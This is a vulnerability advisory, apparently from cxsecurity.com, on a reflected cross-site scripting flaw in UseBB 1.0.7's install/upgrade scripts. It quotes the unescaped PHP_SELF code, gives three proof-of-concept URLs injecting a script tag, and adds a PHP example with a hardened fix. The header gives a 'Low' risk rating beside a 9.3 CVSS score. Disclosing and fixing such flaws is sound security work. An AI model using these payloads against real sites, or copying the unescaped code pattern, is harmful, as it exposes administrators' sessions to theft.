UseBB 1.0.x Cross Site Scripting (XSS)

2007.07.25
Credit: S4mi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#############################################################
# Script...............: UseBB version: 1.0.7               #
# Script Site..........: http://www.usebb.net               #
# Vulnerability........: Cross Site Scripting (XSS)         #
# Access...............: Remote                             #
# Level................: Dangerous                          #
# Author...............: S4mi                               #
# Contact..............: s4mi[at]LinuxMail.org              #
#############################################################

The affected files:
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

Vulnerable code (line ~86 of each file):
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step '.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

$_SERVER['PHP_SELF'] is written into the form's action attribute without any escaping. On typical Apache/mod_php setups PHP_SELF is the script path plus any trailing PATH_INFO, so whatever an attacker appends after the script name lands verbatim inside the attribute: a double quote closes the attribute and the rest of the path is rendered as markup.

PoC:
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document.cookie);</ScRiPt>

These only work while the install directory is still deployed and the web server passes PATH_INFO through to PHP; reflected XSS here still needs a victim (typically the board admin) to open the crafted link.

Solution:
====================
Filter PHP_SELF before echoing it, or, you know what's best, lol: delete the install directory :D

Shoutz:
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others
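The vulnerable form builder beside a hardened version, as an added example that is not UseBB's code. The function names, the constructed request values and the assumption that PHP_SELF carries the PATH_INFO tail (as it does under Apache/mod_php) are mine for illustration; the fix uses htmlspecialchars() and prefers SCRIPT_NAME, which never includes PATH_INFO, over PHP_SELF:

```php
<?php
// Added example, not UseBB's own code. Mirrors the shape of the form builder
// quoted in the advisory (UseBB 1.0.7 install/upgrade-*.php, ~line 86) and
// shows a hardened variant. Function names are assumed for illustration.

declare(strict_types=1);

// Vulnerable shape: the caller's PHP_SELF is concatenated straight into the
// action attribute, exactly like the original line.
function render_step_form_vulnerable(string $php_self, int $step, ?string $posted_step): string
{
    $label = ($posted_step === (string) $step) ? 'Retry step ' . $step : 'Continue to step ' . $step;
    return '<form action="' . $php_self . '" method="post"><p>'
        . '<input type="hidden" name="step" value="' . $step . '" />'
        . '<input type="submit" value="' . $label . '" /></p></form>';
}

// Hardened: every value that lands inside an attribute is HTML-escaped with
// ENT_QUOTES so a stray '"' cannot close the attribute. The action is built
// from SCRIPT_NAME, which does not include the PATH_INFO suffix that PHP_SELF
// carries on Apache/mod_php.
function render_step_form_safe(string $script_name, int $step, ?string $posted_step): string
{
    $esc    = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $label  = ($posted_step === (string) $step) ? 'Retry step ' . $step : 'Continue to step ' . $step;
    return '<form action="' . $esc($script_name) . '" method="post"><p>'
        . '<input type="hidden" name="step" value="' . $step . '" />'
        . '<input type="submit" value="' . $esc($label) . '" /></p></form>';
}

// Constructed request (assumed, not captured): a GET for
//   /UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(document.cookie);</ScRiPt>
// gives PHP_SELF = script path + PATH_INFO, while SCRIPT_NAME is only the script path.
$scriptName = '/UseBB/install/upgrade-0-2-3.php';
$pathInfo   = '/"><ScRiPt>alert(document.cookie);</ScRiPt>';
$phpSelf    = $scriptName . $pathInfo;   // what $_SERVER['PHP_SELF'] looks like for that request

echo "Vulnerable output:\n", render_step_form_vulnerable($phpSelf, 2, null), "\n\n";
echo "Hardened output (SCRIPT_NAME):\n", render_step_form_safe($scriptName, 2, null), "\n\n";

// Even if a caller passed the tainted PHP_SELF to the hardened builder by
// mistake, the escaping alone keeps the payload from becoming markup.
$safe = render_step_form_safe($phpSelf, 2, null);
echo "Payload survives as markup in hardened output? ",
    (strpos($safe, '<ScRiPt>') === false ? 'no' : 'yes'), "\n";
```

Run it with `php example.php`; the first form's action is cut off at the injected quote and the script tag follows it as live markup, whereas the hardened form's action is the bare script path. Deleting the install directory after an upgrade, as the advisory suggests, removes the sink entirely, but the escaping is what protects any other page that echoes PHP_SELF.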


Copyright 2022, cxsecurity.com